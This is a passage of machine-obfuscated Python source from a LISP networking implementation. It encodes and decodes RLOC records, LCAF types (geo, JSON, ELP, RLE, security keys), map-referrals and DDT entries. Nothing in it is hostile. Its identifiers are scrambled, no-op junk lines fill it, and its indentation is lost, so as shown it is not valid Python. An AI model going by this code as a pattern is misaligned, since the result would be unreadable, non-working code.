oO000ooO = self . keys [ 1 ] . encode_lcaf ( self . rloc )
if 81 - 81: I1IiiI . OoOoOO00 - I1IiiI . oO0o
if 50 - 50: OoooooooOO - I1ii11iIi11i
O000o = ""
if ( self . rloc_name ) :
O000o += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
O000o += self . rloc_name + "\0"
if 78 - 78: I1Ii111
if 39 - 39: I1ii11iIi11i - iIii1I11I1II1 * ooOoO0o
OoOoo0 = len ( OOoooooO ) + len ( O0O00ooO0O0O ) + len ( ooOOi1IiI1i1iI1Ii ) + len ( oO000ooO ) + 2 + len ( oOOOOoO00o0oo ) + self . rloc . addr_length ( ) + len ( O000o )
if 53 - 53: IiII
OoOoo0 = socket . htons ( OoOoo0 )
iii1i1I1II = struct . pack ( "HBBBBHH" , o0O000Ooo , 0 , 0 , LISP_LCAF_AFI_LIST_TYPE ,
0 , OoOoo0 , socket . htons ( self . rloc . afi ) )
iii1i1I1II += self . rloc . pack_address ( )
return ( iii1i1I1II + O000o + OOoooooO + O0O00ooO0O0O + ooOOi1IiI1i1iI1Ii + oO000ooO + oOOOOoO00o0oo )
if 5 - 5: iIii1I11I1II1 . OoooooooOO
if 13 - 13: oO0o . o0oOOo0O0Ooo . i11iIiiIii * I1ii11iIi11i / ooOoO0o
def encode ( self ) :
ooOOooooo0Oo = 0
if ( self . local_bit ) : ooOOooooo0Oo |= 0x0004
if ( self . probe_bit ) : ooOOooooo0Oo |= 0x0002
if ( self . reach_bit ) : ooOOooooo0Oo |= 0x0001
if 41 - 41: ooOoO0o + IiII . i1IIi + iIii1I11I1II1
IIii1i = struct . pack ( "BBBBHH" , self . priority , self . weight ,
self . mpriority , self . mweight , socket . htons ( ooOOooooo0Oo ) ,
socket . htons ( self . rloc . afi ) )
if 57 - 57: i11iIiiIii * oO0o * i11iIiiIii
if ( self . geo or self . elp or self . rle or self . keys or self . rloc_name or self . json ) :
if 14 - 14: Oo0Ooo / I11i
IIii1i = IIii1i [ 0 : - 2 ] + self . encode_lcaf ( )
else :
IIii1i += self . rloc . pack_address ( )
if 14 - 14: Oo0Ooo - Ii1I + ooOoO0o - I1IiiI % IiII
return ( IIii1i )
if 70 - 70: I1IiiI % ooOoO0o * OoO0O00 + OoOoOO00 % i11iIiiIii
if 39 - 39: Oo0Ooo % I1Ii111 / I1IiiI / Oo0Ooo . o0oOOo0O0Ooo + o0oOOo0O0Ooo
def decode_lcaf ( self , packet , nonce ) :
O00oO00oOO00O = "HBBBBH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 83 - 83: OoooooooOO * II111iiii % OoooooooOO
O000oOOoOOO , i111IiI1III1 , ooOOooooo0Oo , O000oo0O0OO0 , I1iii1IiI11I11I , iiii1 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 30 - 30: I1Ii111 / o0oOOo0O0Ooo + OoooooooOO + OoOoOO00 + OoO0O00
if 40 - 40: OoooooooOO / IiII
iiii1 = socket . ntohs ( iiii1 )
packet = packet [ ooOoooOoo0oO : : ]
if ( iiii1 > len ( packet ) ) : return ( None )
if 82 - 82: i11iIiiIii - oO0o - i1IIi
if 78 - 78: oO0o % iII111i / i1IIi / ooOoO0o
if 44 - 44: o0oOOo0O0Ooo + Ii1I + I1IiiI % O0
if 100 - 100: OoooooooOO
if ( O000oo0O0OO0 == LISP_LCAF_AFI_LIST_TYPE ) :
while ( iiii1 > 0 ) :
O00oO00oOO00O = "H"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( iiii1 < ooOoooOoo0oO ) : return ( None )
if 27 - 27: i11iIiiIii % II111iiii + I1Ii111
o00OO00OOo0 = len ( packet )
O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
O000oOOoOOO = socket . ntohs ( O000oOOoOOO )
if 76 - 76: OOooOOo - I1Ii111 + iIii1I11I1II1 + I1IiiI * oO0o
if ( O000oOOoOOO == LISP_AFI_LCAF ) :
packet = self . decode_lcaf ( packet , nonce )
if ( packet == None ) : return ( None )
else :
packet = packet [ ooOoooOoo0oO : : ]
self . rloc_name = None
if ( O000oOOoOOO == LISP_AFI_NAME ) :
packet , IiIi1I1i1iII = lisp_decode_dist_name ( packet )
self . rloc_name = IiIi1I1i1iII
else :
self . rloc . afi = O000oOOoOOO
packet = self . rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 93 - 93: i11iIiiIii * i11iIiiIii - I1IiiI + iIii1I11I1II1 * i11iIiiIii
if 14 - 14: ooOoO0o . OoooooooOO . I1IiiI - IiII + iIii1I11I1II1
if 47 - 47: OOooOOo % i1IIi
iiii1 -= o00OO00OOo0 - len ( packet )
if 23 - 23: Ii1I * Ii1I / I11i
if 11 - 11: OOooOOo
elif ( O000oo0O0OO0 == LISP_LCAF_GEO_COORD_TYPE ) :
if 58 - 58: OoO0O00 * OoooooooOO
if 47 - 47: iII111i - Oo0Ooo
if 19 - 19: O0 . i1IIi + I11i / II111iiii + ooOoO0o
if 26 - 26: Ii1I * oO0o % I1IiiI - OOooOOo . I1Ii111
iiIi1ii1IiI = lisp_geo ( "" )
packet = iiIi1ii1IiI . decode_geo ( packet , iiii1 , I1iii1IiI11I11I )
if ( packet == None ) : return ( None )
self . geo = iiIi1ii1IiI
if 39 - 39: O0 . OoOoOO00 / I11i * I11i % II111iiii % iIii1I11I1II1
elif ( O000oo0O0OO0 == LISP_LCAF_JSON_TYPE ) :
if 76 - 76: II111iiii
if 12 - 12: Oo0Ooo - oO0o . I1ii11iIi11i . iII111i . Ii1I / i1IIi
if 62 - 62: I11i . I1IiiI * i11iIiiIii
if 33 - 33: iIii1I11I1II1 - I1Ii111 % OoO0O00 % i1IIi
O00oO00oOO00O = "H"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( iiii1 < ooOoooOoo0oO ) : return ( None )
if 81 - 81: i1IIi * iII111i % I1ii11iIi11i - I1IiiI * I1Ii111 + OOooOOo
oo0ooOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
oo0ooOO = socket . ntohs ( oo0ooOO )
if ( iiii1 < ooOoooOoo0oO + oo0ooOO ) : return ( None )
if 66 - 66: Oo0Ooo
packet = packet [ ooOoooOoo0oO : : ]
self . json = lisp_json ( "" , packet [ 0 : oo0ooOO ] )
packet = packet [ oo0ooOO : : ]
if 82 - 82: IiII + OoooooooOO . I11i
elif ( O000oo0O0OO0 == LISP_LCAF_ELP_TYPE ) :
if 11 - 11: Ii1I + OoO0O00
if 47 - 47: I11i . i11iIiiIii / II111iiii / IiII
if 53 - 53: i1IIi - Oo0Ooo * O0 * OOooOOo . OoooooooOO
if 99 - 99: oO0o . OoO0O00 / OOooOOo
Ii1111i = lisp_elp ( None )
Ii1111i . elp_nodes = [ ]
while ( iiii1 > 0 ) :
ooOOooooo0Oo , O000oOOoOOO = struct . unpack ( "HH" , packet [ : 4 ] )
if 17 - 17: OoO0O00
O000oOOoOOO = socket . ntohs ( O000oOOoOOO )
if ( O000oOOoOOO == LISP_AFI_LCAF ) : return ( None )
if 69 - 69: O0
Ooo0o0OoOO = lisp_elp_node ( )
Ii1111i . elp_nodes . append ( Ooo0o0OoOO )
if 51 - 51: OoooooooOO - I1ii11iIi11i
ooOOooooo0Oo = socket . ntohs ( ooOOooooo0Oo )
Ooo0o0OoOO . eid = ( ooOOooooo0Oo & 0x4 )
Ooo0o0OoOO . probe = ( ooOOooooo0Oo & 0x2 )
Ooo0o0OoOO . strict = ( ooOOooooo0Oo & 0x1 )
Ooo0o0OoOO . address . afi = O000oOOoOOO
Ooo0o0OoOO . address . mask_len = Ooo0o0OoOO . address . host_mask_len ( )
packet = Ooo0o0OoOO . address . unpack_address ( packet [ 4 : : ] )
iiii1 -= Ooo0o0OoOO . address . addr_length ( ) + 4
if 25 - 25: I1IiiI . OoOoOO00 / iIii1I11I1II1 % i11iIiiIii
Ii1111i . select_elp_node ( )
self . elp = Ii1111i
if 14 - 14: i11iIiiIii + I1IiiI - oO0o - I11i
elif ( O000oo0O0OO0 == LISP_LCAF_RLE_TYPE ) :
if 38 - 38: I1IiiI / i11iIiiIii
if 99 - 99: Ii1I
if 38 - 38: OoOoOO00 / IiII - I1IiiI % O0 + I1ii11iIi11i
if 51 - 51: i1IIi + II111iiii % oO0o
i1I1Ii11II1i = lisp_rle ( None )
i1I1Ii11II1i . rle_nodes = [ ]
while ( iiii1 > 0 ) :
O0o000 , o00oo0 , IiiiIiii , O000oOOoOOO = struct . unpack ( "HBBH" , packet [ : 6 ] )
if 76 - 76: i1IIi
O000oOOoOOO = socket . ntohs ( O000oOOoOOO )
if ( O000oOOoOOO == LISP_AFI_LCAF ) : return ( None )
if 38 - 38: I1IiiI
iIIII1iiIII = lisp_rle_node ( )
i1I1Ii11II1i . rle_nodes . append ( iIIII1iiIII )
if 15 - 15: o0oOOo0O0Ooo
iIIII1iiIII . level = IiiiIiii
iIIII1iiIII . address . afi = O000oOOoOOO
iIIII1iiIII . address . mask_len = iIIII1iiIII . address . host_mask_len ( )
packet = iIIII1iiIII . address . unpack_address ( packet [ 6 : : ] )
if 55 - 55: i11iIiiIii / OoooooooOO - I11i
iiii1 -= iIIII1iiIII . address . addr_length ( ) + 6
if ( iiii1 >= 2 ) :
O000oOOoOOO = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
if ( socket . ntohs ( O000oOOoOOO ) == LISP_AFI_NAME ) :
packet = packet [ 2 : : ]
packet , iIIII1iiIII . rloc_name = lisp_decode_dist_name ( packet )
if 89 - 89: I11i - i1IIi - i1IIi * OOooOOo - O0
if ( packet == None ) : return ( None )
iiii1 -= len ( iIIII1iiIII . rloc_name ) + 1 + 2
if 94 - 94: Oo0Ooo / I11i . I1ii11iIi11i
if 31 - 31: i11iIiiIii + iIii1I11I1II1 . II111iiii
if 72 - 72: I1Ii111 * OoO0O00 + Oo0Ooo / Ii1I % OOooOOo
self . rle = i1I1Ii11II1i
self . rle . build_forwarding_list ( )
if 84 - 84: OoOoOO00 / o0oOOo0O0Ooo
elif ( O000oo0O0OO0 == LISP_LCAF_SECURITY_TYPE ) :
if 9 - 9: Ii1I
if 76 - 76: I1IiiI % Oo0Ooo / iIii1I11I1II1 - Oo0Ooo
if 34 - 34: OoOoOO00 - i1IIi + OOooOOo + Ii1I . o0oOOo0O0Ooo
if 42 - 42: OoO0O00
if 59 - 59: OoO0O00 . I1Ii111 % OoO0O00
OO0o0 = packet
i1ii1iiI11ii1II1 = lisp_keys ( 1 )
packet = i1ii1iiI11ii1II1 . decode_lcaf ( OO0o0 , iiii1 )
if ( packet == None ) : return ( None )
if 22 - 22: Oo0Ooo
if 21 - 21: o0oOOo0O0Ooo
if 86 - 86: ooOoO0o / iIii1I11I1II1 . OOooOOo
if 93 - 93: Oo0Ooo / II111iiii . Oo0Ooo + i1IIi + i1IIi
Iii = [ LISP_CS_25519_CBC , LISP_CS_25519_CHACHA ]
if ( i1ii1iiI11ii1II1 . cipher_suite in Iii ) :
if ( i1ii1iiI11ii1II1 . cipher_suite == LISP_CS_25519_CBC ) :
ii1i1I1111ii = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 30 - 30: OoOoOO00 . OOooOOo % OOooOOo / II111iiii + i1IIi
if ( i1ii1iiI11ii1II1 . cipher_suite == LISP_CS_25519_CHACHA ) :
ii1i1I1111ii = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 61 - 61: i1IIi % II111iiii * II111iiii . o0oOOo0O0Ooo / I1ii11iIi11i - I1Ii111
else :
ii1i1I1111ii = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 93 - 93: Ii1I - i1IIi
packet = ii1i1I1111ii . decode_lcaf ( OO0o0 , iiii1 )
if ( packet == None ) : return ( None )
if 3 - 3: oO0o + OoO0O00 - iII111i / Ii1I
if ( len ( packet ) < 2 ) : return ( None )
O000oOOoOOO = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
self . rloc . afi = socket . ntohs ( O000oOOoOOO )
if ( len ( packet ) < self . rloc . addr_length ( ) ) : return ( None )
packet = self . rloc . unpack_address ( packet [ 2 : : ] )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 58 - 58: Ii1I * I11i
if 95 - 95: oO0o
if 49 - 49: I1IiiI
if 23 - 23: I1Ii111
if 5 - 5: I1ii11iIi11i % OoOoOO00 . OoooooooOO . o0oOOo0O0Ooo + i11iIiiIii
if 54 - 54: ooOoO0o - O0 + iII111i
if ( self . rloc . is_null ( ) ) : return ( packet )
if 34 - 34: Ii1I - OOooOOo % iII111i
iIii1iii1 = self . rloc_name
if ( iIii1iii1 ) : iIii1iii1 = blue ( self . rloc_name , False )
if 80 - 80: I11i + o0oOOo0O0Ooo - I1Ii111 . OoO0O00 * oO0o + OOooOOo
if 96 - 96: i1IIi + i1IIi * I1ii11iIi11i . Oo0Ooo * Oo0Ooo
if 82 - 82: iIii1I11I1II1 % oO0o - I1Ii111 / O0 - iII111i
if 22 - 22: oO0o % O0 * I1Ii111 - iIii1I11I1II1 % iII111i / OoOoOO00
if 43 - 43: OOooOOo / Oo0Ooo / iII111i
if 70 - 70: iII111i . oO0o . o0oOOo0O0Ooo
II1II1iiIiI = self . keys [ 1 ] if self . keys else None
if ( II1II1iiIiI == None ) :
if ( ii1i1I1111ii . remote_public_key == None ) :
iI = bold ( "No remote encap-public-key supplied" , False )
lprint ( " {} for {}" . format ( iI , iIii1iii1 ) )
ii1i1I1111ii = None
else :
iI = bold ( "New encap-keying with new state" , False )
lprint ( " {} for {}" . format ( iI , iIii1iii1 ) )
ii1i1I1111ii . compute_shared_key ( "encap" )
if 27 - 27: iII111i
if 32 - 32: OoOoOO00 . Oo0Ooo . o0oOOo0O0Ooo / I1IiiI
if 23 - 23: iII111i * I1ii11iIi11i / Ii1I - OoOoOO00 . II111iiii
if 74 - 74: I1Ii111 . IiII % iII111i . O0
if 61 - 61: IiII / I11i . I1Ii111 * OoOoOO00 / OoO0O00
if 18 - 18: ooOoO0o % OoO0O00 % OOooOOo . I1ii11iIi11i + II111iiii / iII111i
if 73 - 73: O0 / Ii1I + i11iIiiIii - Ii1I
if 48 - 48: I1IiiI - i11iIiiIii * I1ii11iIi11i
if 70 - 70: I1ii11iIi11i * OoOoOO00
if 63 - 63: ooOoO0o . IiII - OoOoOO00 % IiII - I1Ii111 / I1Ii111
if ( II1II1iiIiI ) :
if ( ii1i1I1111ii . remote_public_key == None ) :
ii1i1I1111ii = None
oo0oO = bold ( "Remote encap-unkeying occurred" , False )
lprint ( " {} for {}" . format ( oo0oO , iIii1iii1 ) )
elif ( II1II1iiIiI . compare_keys ( ii1i1I1111ii ) ) :
ii1i1I1111ii = II1II1iiIiI
lprint ( " Maintain stored encap-keys for {}" . format ( iIii1iii1 ) )
if 42 - 42: i1IIi . OoOoOO00 * OoOoOO00 * OoOoOO00
else :
if ( II1II1iiIiI . remote_public_key == None ) :
iI = "New encap-keying for existing state"
else :
iI = "Remote encap-rekeying"
if 14 - 14: II111iiii / I1Ii111 . I1IiiI
lprint ( " {} for {}" . format ( bold ( iI , False ) ,
iIii1iii1 ) )
II1II1iiIiI . remote_public_key = ii1i1I1111ii . remote_public_key
II1II1iiIiI . compute_shared_key ( "encap" )
ii1i1I1111ii = II1II1iiIiI
if 66 - 66: I1Ii111 % oO0o . iII111i * i1IIi
if 81 - 81: OoooooooOO * I1IiiI / I1Ii111
self . keys = [ None , ii1i1I1111ii , None , None ]
if 10 - 10: I1IiiI - II111iiii / IiII * II111iiii
else :
if 67 - 67: II111iiii . Ii1I % oO0o . Oo0Ooo + IiII
if 10 - 10: OOooOOo - OoO0O00 * oO0o / iIii1I11I1II1 - OoOoOO00
if 20 - 20: IiII % I1IiiI + iIii1I11I1II1 % iII111i
if 100 - 100: o0oOOo0O0Ooo - Oo0Ooo % I1Ii111 . i11iIiiIii % OoooooooOO
packet = packet [ iiii1 : : ]
if 39 - 39: I1ii11iIi11i / i11iIiiIii * i1IIi * Oo0Ooo
return ( packet )
if 39 - 39: OoO0O00 * OoooooooOO / i1IIi + Oo0Ooo
if 57 - 57: O0
def decode ( self , packet , nonce ) :
O00oO00oOO00O = "BBBBHH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 83 - 83: OOooOOo / Ii1I * I1IiiI % oO0o / iIii1I11I1II1
self . priority , self . weight , self . mpriority , self . mweight , ooOOooooo0Oo , O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 1 - 1: I11i / OoooooooOO / iII111i
if 68 - 68: i1IIi / Oo0Ooo / I11i * Oo0Ooo
ooOOooooo0Oo = socket . ntohs ( ooOOooooo0Oo )
O000oOOoOOO = socket . ntohs ( O000oOOoOOO )
self . local_bit = True if ( ooOOooooo0Oo & 0x0004 ) else False
self . probe_bit = True if ( ooOOooooo0Oo & 0x0002 ) else False
self . reach_bit = True if ( ooOOooooo0Oo & 0x0001 ) else False
if 91 - 91: OoO0O00 . iII111i
if ( O000oOOoOOO == LISP_AFI_LCAF ) :
packet = packet [ ooOoooOoo0oO - 2 : : ]
packet = self . decode_lcaf ( packet , nonce )
else :
self . rloc . afi = O000oOOoOOO
packet = packet [ ooOoooOoo0oO : : ]
packet = self . rloc . unpack_address ( packet )
if 82 - 82: I1ii11iIi11i / Oo0Ooo
self . rloc . mask_len = self . rloc . host_mask_len ( )
return ( packet )
if 63 - 63: I1IiiI
if 3 - 3: iII111i + I1ii11iIi11i
def end_of_rlocs ( self , packet , rloc_count ) :
for IiIIi1IiiIiI in range ( rloc_count ) :
packet = self . decode ( packet , None )
if ( packet == None ) : return ( None )
if 35 - 35: oO0o * iII111i * oO0o * I1Ii111 * IiII * i1IIi
return ( packet )
if 43 - 43: OoO0O00 * I1IiiI / IiII . i11iIiiIii + iII111i + o0oOOo0O0Ooo
if 1 - 1: I1IiiI % o0oOOo0O0Ooo . I1Ii111 + I11i * oO0o
if 41 - 41: OoO0O00 * oO0o - II111iiii
if 2 - 2: IiII + IiII - OoO0O00 * iII111i . oO0o
if 91 - 91: ooOoO0o
if 22 - 22: ooOoO0o % OoO0O00 * OoOoOO00 + Oo0Ooo
if 44 - 44: O0 - I11i
if 43 - 43: O0
if 50 - 50: I11i - OoooooooOO
if 29 - 29: oO0o * oO0o
if 44 - 44: ooOoO0o . I1IiiI * oO0o * Ii1I
if 41 - 41: i1IIi % i11iIiiIii + I11i % OoooooooOO / I1ii11iIi11i
if 8 - 8: OoooooooOO - OoO0O00 / i11iIiiIii / O0 . IiII
if 86 - 86: ooOoO0o * OoooooooOO + iII111i + o0oOOo0O0Ooo
if 79 - 79: i1IIi % I1ii11iIi11i - OoO0O00 % I1ii11iIi11i
if 6 - 6: Oo0Ooo / iII111i . i11iIiiIii
if 8 - 8: I1ii11iIi11i + O0 - oO0o % II111iiii . I1Ii111
if 86 - 86: IiII
if 71 - 71: Ii1I - i1IIi . I1IiiI
if 15 - 15: i1IIi % II111iiii / II111iiii - I1ii11iIi11i - I11i % i1IIi
if 54 - 54: i1IIi . OoO0O00 + iII111i + OoO0O00 * i1IIi
if 13 - 13: Oo0Ooo / OoO0O00 + OOooOOo
if 90 - 90: OoO0O00 * i11iIiiIii / oO0o
if 91 - 91: iII111i - OoOoOO00 / Oo0Ooo % II111iiii / II111iiii / o0oOOo0O0Ooo
if 34 - 34: OoO0O00 * II111iiii + i11iIiiIii % Ii1I
if 25 - 25: OoOoOO00 + IiII . i11iIiiIii
if 87 - 87: I1IiiI + OoooooooOO + O0
if 32 - 32: Ii1I / I1ii11iIi11i . Ii1I
if 65 - 65: IiII
if 74 - 74: Oo0Ooo + i1IIi - II111iiii / ooOoO0o / iII111i
class lisp_map_referral ( ) :
def __init__ ( self ) :
self . record_count = 0
self . nonce = 0
if 66 - 66: ooOoO0o / IiII * iIii1I11I1II1
if 42 - 42: I1Ii111 - i11iIiiIii % II111iiii * ooOoO0o . O0 % I11i
def print_map_referral ( self ) :
lprint ( "{} -> record-count: {}, nonce: 0x{}" . format ( bold ( "Map-Referral" , False ) , self . record_count ,
# Ii1I - OoO0O00 + OOooOOo . I1ii11iIi11i - I11i
lisp_hex_string ( self . nonce ) ) )
if 84 - 84: iIii1I11I1II1 . o0oOOo0O0Ooo * OoO0O00 % OoO0O00 * I11i . OoOoOO00
if 43 - 43: oO0o
def encode ( self ) :
ooo0OOoo = ( LISP_MAP_REFERRAL << 28 ) | self . record_count
IIii1i = struct . pack ( "I" , socket . htonl ( ooo0OOoo ) )
IIii1i += struct . pack ( "Q" , self . nonce )
return ( IIii1i )
if 65 - 65: II111iiii % I1ii11iIi11i + OOooOOo + Ii1I
if 39 - 39: i11iIiiIii % iIii1I11I1II1 + ooOoO0o + i11iIiiIii - O0 - I11i
def decode ( self , packet ) :
O00oO00oOO00O = "I"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 71 - 71: OoooooooOO . OoOoOO00 % IiII * iII111i / OOooOOo
ooo0OOoo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
ooo0OOoo = socket . ntohl ( ooo0OOoo [ 0 ] )
self . record_count = ooo0OOoo & 0xff
packet = packet [ ooOoooOoo0oO : : ]
if 63 - 63: O0 * O0 . IiII
O00oO00oOO00O = "Q"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 54 - 54: I1IiiI / i1IIi * I1ii11iIi11i
self . nonce = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
return ( packet )
if 10 - 10: I1IiiI % II111iiii / I1IiiI
if 13 - 13: II111iiii - i11iIiiIii
if 90 - 90: I11i . OoOoOO00 % Oo0Ooo / I1Ii111 . Ii1I % OoO0O00
if 32 - 32: I1IiiI + ooOoO0o / O0 * i11iIiiIii % Oo0Ooo + II111iiii
if 95 - 95: iII111i / ooOoO0o + I1Ii111
if 78 - 78: iIii1I11I1II1 / I1IiiI - IiII
if 81 - 81: I1ii11iIi11i
if 31 - 31: O0 % ooOoO0o / I1IiiI * iII111i % iIii1I11I1II1 * OoOoOO00
class lisp_ddt_entry ( ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . delegation_set = [ ]
self . source_cache = None
self . map_referrals_sent = 0
if 76 - 76: I1Ii111 - O0
if 23 - 23: O0 * Ii1I * ooOoO0o % ooOoO0o
def is_auth_prefix ( self ) :
if ( len ( self . delegation_set ) != 0 ) : return ( False )
if ( self . is_star_g ( ) ) : return ( False )
return ( True )
if 7 - 7: II111iiii + I11i
if 99 - 99: iIii1I11I1II1 * oO0o
def is_ms_peer_entry ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( False )
return ( self . delegation_set [ 0 ] . is_ms_peer ( ) )
if 37 - 37: ooOoO0o * iII111i * I11i
if 11 - 11: I1IiiI
def print_referral_type ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( "unknown" )
ii1iII11 = self . delegation_set [ 0 ]
return ( ii1iII11 . print_node_type ( ) )
if 33 - 33: O0
if 31 - 31: OoO0O00
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 9 - 9: oO0o * OoO0O00 * I1IiiI - I1IiiI % OoO0O00
if 84 - 84: I1IiiI % I1IiiI * Ii1I
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_ddt_cache . add_cache ( self . eid , self )
else :
oo00OOooo = lisp_ddt_cache . lookup_cache ( self . group , True )
if ( oo00OOooo == None ) :
oo00OOooo = lisp_ddt_entry ( )
oo00OOooo . eid . copy_address ( self . group )
oo00OOooo . group . copy_address ( self . group )
lisp_ddt_cache . add_cache ( self . group , oo00OOooo )
if 62 - 62: OoO0O00 . OOooOOo . oO0o + O0 % O0
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( oo00OOooo . group )
oo00OOooo . add_source_entry ( self )
if 76 - 76: o0oOOo0O0Ooo % OOooOOo . I11i . iIii1I11I1II1 + I1Ii111 % OoooooooOO
if 9 - 9: oO0o + Ii1I / I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo
if 64 - 64: I11i % i11iIiiIii % I1ii11iIi11i
def add_source_entry ( self , source_ddt ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ddt . eid , source_ddt )
if 14 - 14: I1Ii111 - OoOoOO00 - I1ii11iIi11i % I11i + OoooooooOO
if 4 - 4: I1Ii111 - I1IiiI / iIii1I11I1II1 + I1ii11iIi11i % iIii1I11I1II1 * I1IiiI
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 30 - 30: i11iIiiIii % OOooOOo
if 52 - 52: I11i - oO0o . i11iIiiIii - II111iiii + Ii1I . iII111i
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 27 - 27: I1IiiI + OoOoOO00 + iII111i
if 70 - 70: I11i + IiII . ooOoO0o - I1ii11iIi11i
if 34 - 34: i1IIi % Oo0Ooo . oO0o
class lisp_ddt_node ( ) :
def __init__ ( self ) :
self . delegate_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . map_server_peer = False
self . map_server_child = False
self . priority = 0
self . weight = 0
if 36 - 36: I1ii11iIi11i / I1Ii111 - IiII + OOooOOo + I1Ii111
if 62 - 62: Oo0Ooo . OoO0O00 * I1Ii111 . i11iIiiIii * O0
def print_node_type ( self ) :
if ( self . is_ddt_child ( ) ) : return ( "ddt-child" )
if ( self . is_ms_child ( ) ) : return ( "map-server-child" )
if ( self . is_ms_peer ( ) ) : return ( "map-server-peer" )
if 10 - 10: Oo0Ooo / OoOoOO00 * OOooOOo - IiII + Ii1I
if 62 - 62: I1IiiI . Ii1I
def is_ddt_child ( self ) :
if ( self . map_server_child ) : return ( False )
if ( self . map_server_peer ) : return ( False )
return ( True )
if 74 - 74: Ii1I - I11i % ooOoO0o - I1IiiI - Ii1I - II111iiii
if 81 - 81: i1IIi * I1ii11iIi11i + IiII - OoO0O00 * i1IIi
def is_ms_child ( self ) :
return ( self . map_server_child )
if 6 - 6: iIii1I11I1II1 % OoOoOO00 % II111iiii % o0oOOo0O0Ooo
if 52 - 52: Ii1I - I1IiiI * iIii1I11I1II1 % Oo0Ooo * OOooOOo
def is_ms_peer ( self ) :
return ( self . map_server_peer )
if 67 - 67: OoooooooOO * I11i * Ii1I * iIii1I11I1II1
if 22 - 22: OoO0O00 / o0oOOo0O0Ooo
if 35 - 35: I1Ii111 / I1Ii111 + o0oOOo0O0Ooo - oO0o
if 40 - 40: OoOoOO00 - II111iiii
if 29 - 29: I1IiiI - O0
if 36 - 36: I1IiiI * I1IiiI
if 79 - 79: I1Ii111 - I11i
class lisp_ddt_map_request ( ) :
def __init__ ( self , lisp_sockets , packet , eid , group , nonce ) :
self . uptime = lisp_get_timestamp ( )
self . lisp_sockets = lisp_sockets
self . packet = packet
self . eid = eid
self . group = group
self . nonce = nonce
self . mr_source = None
self . sport = 0
self . itr = None
self . retry_count = 0
self . send_count = 0
self . retransmit_timer = None
self . last_request_sent_to = None
self . from_pitr = False
self . tried_root = False
self . last_cached_prefix = [ None , None ]
if 49 - 49: II111iiii + O0 * ooOoO0o - Oo0Ooo
if 89 - 89: I1IiiI + I11i . oO0o . II111iiii + oO0o / Oo0Ooo
def print_ddt_map_request ( self ) :
lprint ( "Queued Map-Request from {}ITR {}->{}, nonce 0x{}" . format ( "P" if self . from_pitr else "" ,
# Ii1I % OoO0O00
red ( self . itr . print_address ( ) , False ) ,
green ( self . eid . print_address ( ) , False ) , self . nonce ) )
if 89 - 89: I1ii11iIi11i + I11i / i11iIiiIii * ooOoO0o
if 36 - 36: iII111i / OoooooooOO + Ii1I . I1IiiI
def queue_map_request ( self ) :
self . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
lisp_retransmit_ddt_map_request , [ self ] )
self . retransmit_timer . start ( )
lisp_ddt_map_requestQ [ str ( self . nonce ) ] = self
if 48 - 48: II111iiii / II111iiii . I11i - I1IiiI
if 67 - 67: I1ii11iIi11i + I1ii11iIi11i
def dequeue_map_request ( self ) :
self . retransmit_timer . cancel ( )
if ( lisp_ddt_map_requestQ . has_key ( str ( self . nonce ) ) ) :
lisp_ddt_map_requestQ . pop ( str ( self . nonce ) )
if 52 - 52: i11iIiiIii - O0
if 64 - 64: i11iIiiIii . I1Ii111 / O0 - IiII
if 88 - 88: Ii1I / OoO0O00 - I11i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 11 - 11: OoO0O00 / i1IIi . OoooooooOO
if 40 - 40: IiII + iII111i * I11i + OoOoOO00
if 5 - 5: I1Ii111 / IiII
if 30 - 30: OOooOOo . iII111i % OoO0O00 + oO0o
if 69 - 69: i11iIiiIii + IiII * ooOoO0o * iII111i % oO0o
if 66 - 66: OOooOOo * IiII + O0 - OoooooooOO
if 19 - 19: Oo0Ooo * OoOoOO00
